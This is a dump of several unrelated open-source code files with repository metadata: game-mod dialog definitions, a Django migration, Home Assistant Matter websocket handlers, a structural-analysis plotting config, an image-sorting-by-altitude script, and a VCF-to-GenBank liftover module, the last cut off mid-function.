(str_store_string, s9, "str_no_clear_winner_has_yet_emerged_in_the_fighting_but_i_fear_they_may_be_getting_the_better_of_us"),
(else_try),
(str_store_string, s9, "str_no_clear_winner_has_yet_emerged_in_the_fighting"),
(try_end),
(try_begin),
#(neg|faction_slot_eq, "fac_player_supporters_faction", "slot_faction_leader", "$g_talk_troop"),
(call_script, "script_npc_decision_checklist_peace_or_war", "$players_kingdom", "$faction_requested_to_learn_more_details_about_the_war_against", -1),
(str_store_string, s9, "str_s9_s14"),
(try_end),
]],
scouts.dialog_option,
release_prisoner.dialog_option,
# report
[anyone | plyr, "dplmc_constable_talk", [],
"I want a report.", "dplmc_constable_reports_ask", []
],
[anyone, "dplmc_constable_reports_ask", [],
"About what do you want to have a report?", "dplmc_constable_reports", []
],
reports.kingdom_option,
reports.army_option,
reports.lord_convoy_option,
reports.garrison_option,
[anyone | plyr, "dplmc_constable_reports", [],
"Thank you, that's all for now.", "dplmc_constable_pretalk", []
],
# recruit and train
[anyone | plyr, "dplmc_constable_talk", [],
"Let's talk about recruits and training.", "dplmc_constable_recruits_and_training_ask", []
],
[anyone, "dplmc_constable_recruits_and_training_ask", [],
"Of course.", "dplmc_constable_recruits_and_training", []
],
recruit.dialog_option,
train.dialog_option,
[anyone | plyr, "dplmc_constable_recruits_and_training", [],
"Nevermind", "dplmc_constable_pretalk", []
],
# patrols and troop movement
[anyone | plyr, "dplmc_constable_talk", [],
"Let's talk about patrols and troop movement.", "dplmc_constable_security_ask", []
],
[anyone, "dplmc_constable_security_ask", [],
"Of course.", "dplmc_constable_security", []
],
move_troops.dialog_option,
patrols.create_option,
patrols.return_to_center_option,
patrols.change_target_option,
patrols.disband_option,
[anyone | plyr, "dplmc_constable_security", [],
"Nevermind.", "dplmc_constable_pretalk", []
],
# sell prisoners
[anyone | plyr, "dplmc_constable_talk", [
(store_num_regular_prisoners, reg0),
(ge, reg0, 1)
], "I have some prisoners can you sell them for me?", "dplmc_constable_prisoner", []
],
[anyone, "dplmc_constable_prisoner", [],
"Of course, Sire", "dplmc_constable_pretalk", [
(change_screen_trade_prisoners)
]],
# dismiss constable
[anyone | plyr, "dplmc_constable_talk", [],
"You are dismissed.", "dplmc_constable_dismiss_confirm_ask", []
],
[anyone, "dplmc_constable_dismiss_confirm_ask", [],
"Are you sure that you don't need me anymore?", "dplmc_constable_dismiss_confirm", []
],
[anyone | plyr, "dplmc_constable_dismiss_confirm", [],
"Yes I am.", "dplmc_constable_dismiss_confirm_yes", []
],
[anyone, "dplmc_constable_dismiss_confirm_yes", [],
"As you wish.", "close_window", [
(assign, "$g_player_constable", -1),
(assign, "$g_constable_training_center", -1),
]],
[anyone | plyr, "dplmc_constable_dismiss_confirm", [],
"No I am not.", "dplmc_constable_pretalk", []
],
[anyone | plyr, "dplmc_constable_talk", [],
"Thank you, I will come back to you later.", "close_window", []
],
] \
+ patrols.dialogs \
+ scouts.dialogs \
+ recruit.dialogs \
+ train.dialogs \
+ move_troops.dialogs \
+ reports.dialogs \
+ release_prisoner.dialogs
troops = [
["dplmc_constable", "Constable Sextus", "Constables", tf_hero|tf_male, 0, 0, 'fac_commoners', ['itm_mailbyrniegreen', 'itm_ankleboots'], knight_attrib_4, wp(200), knows_common|knows_trainer_9|knows_shield_3|knows_ironflesh_3|knows_power_strike_4|knows_athletics_4, 0x0000000b4b1015054b1b4d591cba28d300000000001e472b0000000000000000]
] \
+ scouts.troops \
+ recruit.troops
party_templates = scouts.party_templates \
+ recruit.party_templates
|
[
"gdwitt@gmail.com"
] |
gdwitt@gmail.com
|
7efeaee7546af9515411ae9bd7622a9865699969
|
849971a1afda0757ddfaa02361d5b4eedc4833b0
|
/project/shortener/migrations/0004_auto_20201103_0819.py
|
0db5dd986126ad6ad0d4b7f248c68feec73fdec4
|
[] |
no_license
|
mahdibohloul/UrlShortenerAPIHandler
|
74c7549f9309e1f59002428a4a508d694191c152
|
9d12ad3f9d0197de577dc5edb59fdf7785f33874
|
refs/heads/main
| 2023-01-10T06:55:20.698789
| 2020-11-03T13:29:40
| 2020-11-03T13:29:40
| 309,677,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
# Generated by Django 3.1.2 on 2020-11-03 08:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shortener', '0003_auto_20201102_1145'),
]
operations = [
migrations.AlterField(
model_name='urls',
name='init_url',
field=models.URLField(),
),
migrations.AlterField(
model_name='urls',
name='short_url',
field=models.URLField(),
),
]
|
[
"mahdi_bohloul@yahoo.com"
] |
mahdi_bohloul@yahoo.com
|
4261205d147bd377b81a8fb578bf7586b1f999d2
|
296132d2c5d95440b3ce5f4401078a6d0f736f5a
|
/homeassistant/components/matter/api.py
|
36cf83fd0dab7563414b7bed72aa10b48494fe9e
|
[
"Apache-2.0"
] |
permissive
|
mezz64/home-assistant
|
5349a242fbfa182159e784deec580d2800173a3b
|
997d4fbe5308b01d14ceabcfe089c2bc511473dd
|
refs/heads/dev
| 2023-03-16T22:31:52.499528
| 2022-12-08T02:55:25
| 2022-12-08T02:55:25
| 68,411,158
| 2
| 1
|
Apache-2.0
| 2023-03-10T06:56:54
| 2016-09-16T20:04:27
|
Python
|
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
"""Handle websocket api for Matter."""
from __future__ import annotations
from collections.abc import Callable
from functools import wraps
from typing import Any
from matter_server.client.exceptions import FailedCommand
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api import ActiveConnection
from homeassistant.core import HomeAssistant, callback
from .adapter import MatterAdapter
from .const import DOMAIN
ID = "id"
TYPE = "type"
@callback
def async_register_api(hass: HomeAssistant) -> None:
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_commission)
websocket_api.async_register_command(hass, websocket_commission_on_network)
websocket_api.async_register_command(hass, websocket_set_thread_dataset)
websocket_api.async_register_command(hass, websocket_set_wifi_credentials)
def async_get_matter_adapter(func: Callable) -> Callable:
"""Decorate function to get the MatterAdapter."""
@wraps(func)
async def _get_matter(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
"""Provide the Matter client to the function."""
matter: MatterAdapter = next(iter(hass.data[DOMAIN].values()))
await func(hass, connection, msg, matter)
return _get_matter
def async_handle_failed_command(func: Callable) -> Callable:
"""Decorate function to handle FailedCommand and send relevant error."""
@wraps(func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
*args: Any,
**kwargs: Any,
) -> None:
"""Handle FailedCommand within function and send relevant error."""
try:
await func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission",
vol.Required("code"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Add a device to the network and commission the device."""
await matter.matter_client.commission_with_code(msg["code"])
connection.send_result(msg[ID])
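# Example message handled by websocket_commission (illustrative; the pairing
# code value below is a placeholder, not a real device code):
#   {"id": 5, "type": "matter/commission", "code": "MT:Y24J0AFN00KA0648G00"}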
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission_on_network",
vol.Required("pin"): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission_on_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Commission a device already on the network."""
await matter.matter_client.commission_on_network(msg["pin"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_thread",
vol.Required("thread_operation_dataset"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_thread_dataset(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set thread dataset."""
await matter.matter_client.set_thread_operational_dataset(
msg["thread_operation_dataset"]
)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_wifi_credentials",
vol.Required("network_name"): str,
vol.Required("password"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_wifi_credentials(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set WiFi credentials for a device."""
await matter.matter_client.set_wifi_credentials(
ssid=msg["network_name"], credentials=msg["password"]
)
connection.send_result(msg[ID])
|
[
"noreply@github.com"
] |
noreply@github.com
|
bd91cb8c7e9e1344cfd7f3d1410c23d658e9438d
|
ba054fa1ec409011444e9c6b963309745e150d6f
|
/ps_bole_calculs_statiques/xc_model_impact/loadStateData.py
|
69e20459fe07531c2303bcc316ffa946b24e867d
|
[] |
no_license
|
berndhahnebach/XCmodels
|
a6500fdde253dea10ef2bb64b7ebc3dbfc2577c2
|
4acdd7747abd7cd71f5ef580f65e93359560e5a9
|
refs/heads/master
| 2020-04-02T23:36:36.385054
| 2018-10-20T16:49:21
| 2018-10-20T16:49:21
| 154,873,006
| 0
| 0
| null | 2018-10-26T17:52:36
| 2018-10-26T17:52:35
| null |
UTF-8
|
Python
| false
| false
| 5,140
|
py
|
# -*- coding: utf-8 -*-
'''In this script we define default data of load cases to be used (or changed)
while displaying loads or results associated to single load cases
'''
from postprocess.reports import graphical_reports
'''
Definition of record objects with these attributes:
loadCaseName: name of the load case to be depicted
loadCaseDescr: description text of the load case
loadCaseExpr: mathematical expression to define the load case (ex:
'1.0*GselfWeight+1.0*DeadLoad')
setsToDispLoads: ordered list of sets of elements to display loads
setsToDispBeamLoads: ordered list of sets of beam elements to display loads
(defaults to [])
compElLoad: component of load on beam elements to be represented
available components: 'axialComponent', 'transComponent',
'transYComponent','transZComponent'
unitsScaleLoads: factor to apply to loads if we want to change
the units (defaults to 1).
    unitsLoads: text to specify the units in which loads are
represented (defaults to 'units:[m,kN]')
vectorScaleLoads: factor to apply to the vectors length in the
representation of loads (defaults to 1 -> auto-scale).
vectorScalePointLoads: factor to apply to the vectors length in the
representation of nodal loads (defaults to 1).
multByElemAreaLoads: boolean value that must be True if we want to
represent the total load on each element
(=load multiplied by element area) and False if we
are going to depict the value of the uniform load
per unit area (defaults to False)
listDspRot: ordered list of displacement or rotations to be displayed
available components: 'uX', 'uY', 'uZ', 'rotX', rotY', 'rotZ'
(defaults to ['uX', 'uY', 'uZ'])
setsToDispDspRot: ordered list of sets of elements to display displacements
or rotations
unitsScaleDispl: factor to apply to displacements if we want to change
the units (defaults to 1).
    unitsDispl: text to specify the units in which displacements are
                represented (defaults to '[m]')
listIntForc: ordered list of internal forces to be displayed as scalar field
over «shell» elements
available components: 'N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'
(defaults to ['N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'])
setsToDispIntForc: ordered list of sets of elements (of type «shell»)to
display internal forces
listBeamIntForc: ordered list of internal forces to be displayed
as diagrams on lines for «beam» elements
available components: 'N', 'My', 'Mz', 'Qy', 'Qz','T'
(defaults to ['N', 'My', 'Mz', 'Qy', 'Qz','T'])
setsToDispBeamIntForc: ordered list of sets of elements (of type «beam»)to
display internal forces (defaults to [])
    scaleDispBeamIntForc: tuple (escN,escQ,escM) corresponding to the scales to
apply to displays of, respectively, N Q and M beam internal
forces (defaults to (1.0,1.0,1.0))
unitsScaleForc: factor to apply to internal forces if we want to change
the units (defaults to 1).
    unitsForc: text to specify the units in which forces are
represented (defaults to '[kN/m]')
unitsScaleMom: factor to apply to internal moments if we want to change
the units (defaults to 1).
    unitsMom: text to specify the units in which bending moments are
represented (defaults to '[kN.m/m]')
viewName: name of the view that contains the renderer (available standard
views: "XYZPos", "XYZNeg", "XPos", "XNeg","YPos", "YNeg",
"ZPos", "ZNeg", "+X+Y+Z", "+X+Y-Z", "+X-Y+Z", "+X-Y-Z",
"-X+Y+Z", "-X+Y-Z",
"-X-Y+Z", "-X-Y-Z") (defaults to "XYZPos")
hCamFct: factor that applies to the height of the camera position
in order to change perspective of isometric views
(defaults to 1, usual values 0.1 to 10)
viewNameBeams: name of the view for beam elements displays (defaults to "XYZPos")
hCamFctBeams: factor that applies to the height of the camera position for
beam displays (defaults to 1)
'''
A1=graphical_reports.RecordLoadCaseDisp(loadCaseName='A1',loadCaseDescr='A1: impact on parapet head',loadCaseExpr='1.0*A1',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A1.unitsScaleLoads= 1e-3
A1.unitsScaleForc= 1e-3
A1.unitsScaleMom= 1e-3
A1.unitsScaleDispl= 1e3
A1.viewName= "-X+Y+Z"
A1.unitsDispl='[mm]'
A2=graphical_reports.RecordLoadCaseDisp(loadCaseName='A2',loadCaseDescr='A2: impact on parapet body',loadCaseExpr='1.0*A2',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A2.unitsScaleLoads= 1e-3
A2.unitsScaleForc= 1e-3
A2.unitsScaleMom= 1e-3
A2.unitsScaleDispl= 1e3
A2.viewName= "-X+Y+Z"
A2.unitsDispl='[mm]'
|
[
"ana.Ortega.Ort@gmail.com"
] |
ana.Ortega.Ort@gmail.com
|
5bed36efedd9b5290786cb93423213be9d9e8ebf
|
30d7952013d8bc1fc798813e819de83276229fca
|
/altitudeOrganize_V2.py
|
ebf16f520338735aa84d65a3486ac94be6f74050
|
[] |
no_license
|
ChrisZarzar/uas-boundary-layer
|
2d0ed6d63d1b7e7d741fd8909adb4bd72de9a99a
|
805b87e2d769872bee952d9dee6697ad14425800
|
refs/heads/master
| 2020-05-17T10:13:24.927928
| 2019-04-26T15:30:50
| 2019-04-26T15:30:50
| 183,652,003
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,148
|
py
|
"""
Purpose: This script will create
a textfile list of the altitude information
extracted from images in a directory.
"""
__version__ = "$Revision: 2.0 $"[11:-2]
__date__ = "$Date: 2017/05/30 12:09:47 $"[7:-2]
__author__ = "Chris Zarzar <chriszarzar@gmail.com>"
"""
Author: Chris Zarzar
Purpose: This script will extract gps information from the
North Farm Experiment Canon DSLR camera and will
copy the images into folders depending on their GPS information
Requirements:
1. Python Image Library (PIL)
2. ExifRead
3. imageinfo
a. gpsExtract
______________________________________________________________________________
#### HISTORY ####
21-jun-2016 [Chris Zarzar]: Created
30-may-2017 [Chris Zarzar]: Edited; adjusted to make the script more intuitive by creating
necessary directories and searching.
______________________________________________________________________________
"""
from imageinfo import gpsExtract
import os
import shutil
imageDir = "C:\\Users\\chris\\OneDrive\\Desktop\\Research\\NorthFarm_Experiment\\canon"
#create required directories
orgDir = imageDir + "/canonOrganized"
if not os.path.exists(orgDir):
os.makedirs(orgDir)
altVector = (30,100,200,300,400,500,600,700,800)
for x in altVector:
if not os.path.exists(orgDir+"/"+str(x)):
os.makedirs(orgDir+"/"+str(x))
try:
# Loop through the image directory and extract metadata information from each image.
for dirName, subdirList, fileList in os.walk(imageDir):
for fname in fileList:
if fname.endswith('.jpg') or fname.endswith('.JPG'):
print "Extracting GPS information from %s" % fname
fpath = dirName+"\\"+fname
gpsInfo = gpsExtract.gpsInfo
gpsOut = gpsInfo(fpath)
if 6<= (gpsOut[2]- 87.2) <=12:
outDir = orgDir+"/30"
shutil.copy2(fpath, outDir)
elif 27<= (gpsOut[2]- 87.2) <=33:
outDir = orgDir+"/100"
shutil.copy2(fpath, outDir)
elif 57<= (gpsOut[2]- 87.2) <=63:
outDir = orgDir+"/200"
shutil.copy2(fpath, outDir)
elif 88<= (gpsOut[2]- 87.2) <=94:
outDir = orgDir+"/300"
shutil.copy2(fpath, outDir)
elif 118<= (gpsOut[2]- 87.2) <=123:
outDir = orgDir+"/400"
shutil.copy2(fpath, outDir)
elif 149<= (gpsOut[2]- 87.2) <=155:
outDir = orgDir+"/500"
shutil.copy2(fpath, outDir)
elif 179<= (gpsOut[2]- 87.2) <=185:
outDir = orgDir+"/600"
shutil.copy2(fpath, outDir)
elif 210<= (gpsOut[2]- 87.2) <=216:
outDir = orgDir+"/700"
shutil.copy2(fpath, outDir)
elif 240<= (gpsOut[2]- 87.2) <=246:
outDir = orgDir+"/800"
shutil.copy2(fpath, outDir)
except:
pass
print "Processing complete"
##END##
|
[
"cmzarzar@gmail.com"
] |
cmzarzar@gmail.com
|
2e35a7f0f323931f6f815ef376f0ecbb345c6106
|
19acbc03360d373071a4ddb74855b7087e074089
|
/contents/vcf_to_genbank.py
|
b19dd134ec896769bf2ddcb7d0b86bd81b84afd8
|
[] |
no_license
|
glebkuznetsov/recoli_c321d_genome_annotation
|
5452d5418e52374c429ac974150f5d0e27e11a93
|
25f3caba9d62f7741cebcdbb3eeefd831f703f2b
|
refs/heads/master
| 2021-05-28T01:11:27.200718
| 2014-12-01T06:13:00
| 2014-12-01T06:13:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,947
|
py
|
"""
Methods for impressing the changes in a VCF file onto an existing
Genbank file.
NOTES:
* Look into insertion annotations being 1 off (specifically galk insertion at SIR.30.31i).
* Annotation of deletion d_mg1655_66564_66733 partial deletion of repeat region 66564 66733 seems to be one off.
"""
import copy
import csv
import os
import pickle
from Bio import SeqIO
from Bio.SeqFeature import FeatureLocation
from Bio.SeqFeature import SeqFeature
from Bio.SeqRecord import SeqRecord
import vcf
from biopython_util import add_feature_to_seq_record
from biopython_util import delete_interval
from biopython_util import insert_sequence_and_update_features
from refactor_config import GENOMES_DIR
###############################################################################
# File locations
###############################################################################
REC1_C321D_ROOT = os.path.join(GENOMES_DIR, 'rec1_c321d')
###############################################################################
# Constants
###############################################################################
VARIANT_ANNOTATION_TYPE = 'variation'
MAX_REPLACE_CHARS = 12
###############################################################################
# Helper objects used by the main procedure
###############################################################################
class RuntimeLiftover(object):
"""Object that aids in dynamically updating a genome record with a list of
positions that are relative to the original genome record.
An example of a case where this is useful is when you are creating a
mapping from a vcf record which shows SNPs and other variants relative
to a reference genome.
For example, say you have two insertions:
* A - position: 100, size: 3
* B - position: 200, size: 4
When we introduce the first insertion, the frame of the underlying genome
has shifted, so that the second insertion should really be added at
position 200 + 3.
"""
def __init__(self, original_genome_record):
"""Constructor.
"""
# The original record. This remains unchanged throughout the
# mapping process.
# TODO: Do we even need to be keeping track of this? Or are intervals
# sufficient?
self.source_genome_record = original_genome_record
# Structure that maintains the mapping of intervals.
# Let's say we guarantee that it's sorted and exclusive, for now.
# NOTE: Each interval maintains a one-to-one mapping and so is
# inclusive bounds on both ends.
self._interval_mapping = self._initialize_interval_mapping()
def _initialize_interval_mapping(self):
"""Initializes the interval mapping.
"""
# The initial mapping is a list with a single element, which is
# a pair of tuples representing the correspondence between the original
# whole sequence interval and a copy of itself.
original_interval = (0, len(self.source_genome_record) - 1)
initial_mapping_pair = (original_interval, copy.copy(original_interval))
return [initial_mapping_pair]
@classmethod
def from_pickled_intervals(cls, original_genome_record, pickle_dest):
"""Factory method that creates a RuntimeLiftover object and sets
the intervals from a pickle file.
The original genome record still has to be provided.
"""
runtime_liftover = cls(original_genome_record)
with open(pickle_dest) as pickle_fh:
runtime_liftover._interval_mapping = pickle.load(pickle_fh)
return runtime_liftover
def pickle_interval_mapping(self, pickle_dest):
"""Pickle the interval mapping and write to file.
This is useful for debugging intervals and developing other output
formats.
"""
with open(pickle_dest, 'w') as pickle_fh:
pickle.dump(self._interval_mapping, pickle_fh)
def write_chain_file(self, chain_file_dest):
"""Writes the current state of _interval_mapping in the UCSC
liftover chain file format.
See: http://genome.ucsc.edu/goldenPath/help/chain.html
"""
with open(chain_file_dest, 'w') as chain_file_fh:
# Write the heading.
chain_file_fh.write('chain\n')
# Each row is of the form 'size dt dq', separated by spaces.
# * size: the size of the ungapped alignment
# * dt: the difference between the end of this block and the
# beginning of the next block (reference sequence)
# * dq: the difference between the end of this block and the
# beginning of the next block (query sequence)
# NOTE: The last line of the alignment section contains only one
# number: the ungapped alignment size of the last block.
interval_index = 0
num_interval_mappings = len(self._interval_mapping)
for interval_index in range(num_interval_mappings):
# I am using the names '*reference*' and '*query*' in the sense
# that the chain file uses them, where query sequence is the one
# whose coordinates we are generally trying to convert into the
# frame of the target. Typically the query sequence is the one
# we mapped the VCF changes on top of.
(current_reference_interval, current_query_interval) = (
self._interval_mapping[interval_index])
size = bases_in_interval(current_reference_interval)
next_interval_index = interval_index + 1
if next_interval_index < num_interval_mappings:
(next_reference_interval, next_query_interval) = (
self._interval_mapping[next_interval_index])
dt = (next_reference_interval[0] -
current_reference_interval[1] - 1)
dq = (next_query_interval[0] -
current_query_interval[1] - 1)
chain_file_fh.write('%d %d %d\n' % (size, dt, dq))
else:
# This is the last line. Just write the block size.
chain_file_fh.write('%d\n' % (size,))
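    # Worked example (illustrative): after handle_insertion of a 3-base
    # sequence at position 100 in a 1000-base record, the mapping is
    # [((0, 99), (0, 99)), ((100, 999), (103, 1002))], and the chain body
    # written above is '100 0 3' followed by the final block size '900'.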
def convert_source_position_to_target(self, source_position, or_next=False):
"""Converts a single position in the source genome to the corresponding
position in the target genome (the one being updated).
Args:
source_position: Position in the source genome. (0-indexed).
or_next: If True, when no direct mapping, return the next position.
Returns:
The position in the target genome, or None if mapping failed.
"""
assert isinstance(source_position, int), "source_position must be int."
# For now, the algorithm is to first search every interval in the
# internal interval mapping data structure until we find the one that
# the source position lies in, and then find the corresponding target
# position by using the relative offset of the source position within
# the interval.
for mapping_index in xrange(len(self._interval_mapping)):
source_interval, target_interval = self._interval_mapping[
mapping_index]
if source_interval[0] <= source_position <= source_interval[1]:
interval_index = source_position - source_interval[0]
return target_interval[0] + interval_index
if or_next and source_position < source_interval[0]:
return self.convert_source_position_to_target(
source_interval[0], or_next=or_next)
return None
def convert_target_position_to_source(self, target_position):
"""Converts a single position in the target genome to the corresponding
position in the source genome (the one being updated).
Similar, but more limited than convert_source_position_to_target().
Args:
target_position: Position in the target genome. (0-indexed).
Returns:
The position in the source genome, or None if mapping failed.
"""
assert isinstance(target_position, int), "target_position must be int."
for mapping_index in xrange(len(self._interval_mapping)):
source_interval, target_interval = self._interval_mapping[
mapping_index]
if target_interval[0] <= target_position <= target_interval[1]:
interval_index = target_position - target_interval[0]
return source_interval[0] + interval_index
return None
def handle_insertion(self, variant_data):
"""Handles an insertion with the given data spec.
"""
# Create a new interval mapping and replace the member attribute
# at the end.
new_interval_mapping = []
# Parse the insert data object.
insert_position = variant_data['position']
insert_sequence = variant_data['sequence']
len_insert_sequence = len(insert_sequence)
# We use a state machine strategy to first find the interval
# to insert, and then update all downstream target intervals.
STATE_SEARCHING = 'SEARCHING'
STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
state = STATE_SEARCHING
for idx, (source_interval, target_interval) in enumerate(
self._interval_mapping):
if state == STATE_SEARCHING:
if source_interval[0] <= insert_position <= source_interval[1]:
insert_position_index = insert_position - source_interval[0]
# The source simply gets split.
new_source_interval_upstream = (source_interval[0],
insert_position - 1)
new_source_interval_downstream = (insert_position,
source_interval[1])
# The target gets split, with the downstream interval
# shifted by the size of the insertion sequence.
new_target_interval_upstream = (target_interval[0],
target_interval[0] + insert_position_index - 1)
new_target_interval_downstream = (target_interval[0] +
insert_position_index + len_insert_sequence,
target_interval[1] + len_insert_sequence)
# Append the split sequence pairs.
new_interval_mapping.append((new_source_interval_upstream,
new_target_interval_upstream))
new_interval_mapping.append((new_source_interval_downstream,
new_target_interval_downstream))
# Update the state for remaining iterations.
state = STATE_UPDATING_TARGET_DOWNSTREAM
elif insert_position < source_interval[0]:
# The insert_position was deleted. Shift the target
# interval downstream by the size of the insertion.
new_source_interval = (
source_interval[0],
source_interval[1])
new_target_interval = (
target_interval[0] + len(insert_sequence),
target_interval[1] + len(insert_sequence))
assert (bases_in_interval(new_source_interval) ==
bases_in_interval(new_target_interval))
new_interval_mapping.append((new_source_interval,
new_target_interval))
state = STATE_UPDATING_TARGET_DOWNSTREAM
else:
new_interval_mapping.append(
(source_interval, target_interval))
else:
# Shift all remaining target intervals.
new_target_interval = (
target_interval[0] + len_insert_sequence,
target_interval[1] + len_insert_sequence)
new_interval_mapping.append((source_interval,
new_target_interval))
if state == STATE_SEARCHING:
raise RuntimeError("Error updating RuntimeLiftover with %s", (
str(variant_data,)))
self._interval_mapping = new_interval_mapping
def handle_deletion(self, variant_data):
"""Handles a deletion with the given data spec.
Args:
variant_data: Dictionary with keys:
* interval: A two-tuple representing pythonic interval for the
deletion, i.e. (inclusive_start, exclusive_end).
e.g. (100, 102) is a deletion of the 2 bases at positions
100 and 101. Relative to the source genome.
"""
        interval = variant_data['interval']
        delete_position = interval[0]
        # The deletion spans the whole half-open source interval, so all
        # downstream target coordinates shrink by its full length.
        delete_interval_size = interval[1] - interval[0]
# Create a new interval mapping and replace the member attribute
# at the end.
new_interval_mapping = []
# We use a state machine strategy to first find the interval
# to delete, and then update all downstream target intervals.
STATE_SEARCHING = 'SEARCHING'
STATE_UPDATING_TARGET_DOWNSTREAM = 'UPDATING_TARGET_DOWNSTREAM'
state = STATE_SEARCHING
for source_interval, target_interval in self._interval_mapping:
if state == STATE_SEARCHING:
if source_interval[0] <= delete_position <= source_interval[1]:
delete_position_index = delete_position - source_interval[0]
# The source simply gets split, dropping a base.
new_source_interval_upstream = (source_interval[0],
delete_position - 1)
new_source_interval_downstream = (
delete_position + delete_interval_size,
source_interval[1])
# The target gets split, including the position, but
# reducing the size of this and all following intervals.
new_target_interval_upstream = (target_interval[0],
target_interval[0] + delete_position_index - 1)
new_target_interval_downstream = (
target_interval[0] + delete_position_index,
target_interval[1] - delete_interval_size)
# Append the split sequence pairs.
new_interval_mapping.append((new_source_interval_upstream,
new_target_interval_upstream))
new_interval_mapping.append((new_source_interval_downstream,
new_target_interval_downstream))
# Update the state for remaining iterations.
state = STATE_UPDATING_TARGET_DOWNSTREAM
elif delete_position < source_interval[0]:
# The interval this delete_position would have fallen
# into has been deleted, effectively delete the first
# position in this current interval.
new_source_interval = (source_interval[0] + 1,
source_interval[1])
new_target_interval = (target_interval[0],
target_interval[1] - 1)
new_interval_mapping.append((new_source_interval,
new_target_interval))
state = STATE_UPDATING_TARGET_DOWNSTREAM
else:
new_interval_mapping.append(
(source_interval, target_interval))
else: # state == STATE_UPDATING_TARGET_DOWNSTREAM
# Shift all remaining target intervals.
new_target_interval = (
target_interval[0] - delete_interval_size,
target_interval[1] - delete_interval_size)
new_interval_mapping.append(
(source_interval, new_target_interval))
if state == STATE_SEARCHING:
raise RuntimeError("Error updating RuntimeLiftover for %s" % (
str(variant_data,)))
self._interval_mapping = new_interval_mapping
def bases_in_interval(interval):
"""Returns the number of bases in the liftover interval.
    Intervals are inclusive on both ends (i.e. not Pythonic), so e.g.
    bases_in_interval((100, 102)) == 3.
"""
return interval[1] - interval[0] + 1
class VCFToGenbankMaker(object):
"""Object that encapsulates the logic for updating a genbank file
with changes from a vcf file.
Usage:
1. Construct an instance according to the constructor signature.
2. Call run().
"""
def __init__(self, genome_record, vcf_path, sample_id,
manual_updates_filepath=None):
"""Constructor.
"""
# Keep a copy of the original genome record.
self.original_genome_record = copy.deepcopy(genome_record)
# The record that is mutated as we progress.
self.genome_record = genome_record
# Save the path to the vcf. We'll use the vcf.Reader stream reader
# object when we actually need to handle it.
self.vcf_path = vcf_path
# The specific sample in the vcf.
self.sample_id = sample_id
# Location with manual updates. Might be None.
self.manual_updates_filepath = manual_updates_filepath
# Object used to track the dynamically changing interval mapping
# positions in the original genome record with respect to which
# vcf positions were identified to the most up-to-date genome.
self.runtime_liftover = RuntimeLiftover(self.original_genome_record)
def run(self, verbose=False, log_file=None):
"""Performs the actual updating.
"""
# Manually add annotations for TAG.
add_TAG_annotations(self.genome_record)
# Add changes made manually.
if self.manual_updates_filepath:
if verbose: print '...Handling manual updates...'
self.handle_manual_updates()
if verbose: print '...Done handling manual updates.'
# Extra data to add to features.
position_to_data_map = get_vcf_metadata()
# Keep track of which vcf changes were actually made.
vcf_positions_updated = []
if verbose: print 'Handling vcf...'
with open(self.vcf_path) as vcf_fh:
vcf_reader = vcf.Reader(vcf_fh)
sample_index = vcf_reader.samples.index(self.sample_id)
for idx, record in enumerate(vcf_reader):
if verbose: print idx, record
# metadata = position_to_data_map.get(record.POS, None)
metadata = None
was_change_made = self.handle_vcf_record(
record, sample_index, metadata)
assert isinstance(was_change_made, bool), (
"handle_vcf_record() must return a boolean.")
if was_change_made:
vcf_positions_updated.append(record.POS)
# Write debug output for which changes were actually made.
if log_file:
with open(log_file, 'w') as log_fh:
for pos in vcf_positions_updated:
log_fh.write(str(pos) + '\n')
def handle_manual_updates(self):
"""Adds manual updates from an external file with the following
tab-separated fields:
* Cassette
* Comment
* LP
* RP
* Sequence
"""
assert self.manual_updates_filepath, "No manual updates specified."
with open(self.manual_updates_filepath) as fh:
line = fh.readline() # Skip the header.
line = fh.readline()
while line:
# Parse the arguments.
args = line.split('\t')
                if len(args) < 4:  # Need all four required tab-separated fields.
line = fh.readline()
continue
fix_id = args[0]
note = args[1]
left_bp = int(args[2].strip())
right_bp = int(args[3].strip())
if len(args) == 5 and len(args[4].strip()):
seq = args[4].strip()
else:
seq = None
# Process the args to get the data necessary to make the update.
pythonic_start = left_bp - 1
pythonic_end = right_bp - 1
ref = str(self.original_genome_record.seq[
pythonic_start:pythonic_end])
if seq:
alt = seq
else:
alt = ''
# Make the update for this record.
self._update_genome_record_for_variant(
